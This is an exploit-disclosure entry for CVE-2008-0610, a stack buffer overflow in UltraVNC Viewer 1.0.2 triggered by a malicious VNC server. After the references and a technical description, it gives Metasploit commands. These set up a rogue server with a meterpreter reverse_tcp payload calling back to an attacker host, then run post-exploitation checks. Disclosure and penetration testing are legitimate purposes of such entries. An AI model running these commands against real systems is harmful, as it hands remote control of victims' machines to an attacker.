Timeline :

Vulnerability reported by the vendor the 2008-02-08
Metasploit PoC provided the 2012-03-26

PoC provided by :

noperand

Reference(s) :

CVE-2008-0610
OSVDB-42840

Affected version(s) :

UltraVNC Viewer 1.0.2 and 1.0.4 RC

Tested on Windows XP Pro SP3 with :

UltraVNC Viewer 1.0.2

Description :

This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release. If a malicious server responds to a client connection indicating a minor protocol version of 14 or 16, a 32-bit integer is subsequently read from the TCP stream by the client and directly provided as the trusted size for further reading from the TCP stream into a 1024-byte character array on the stack.

Commands :

use exploit/windows/vnc/ultravnc_viewer_bof
SET SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid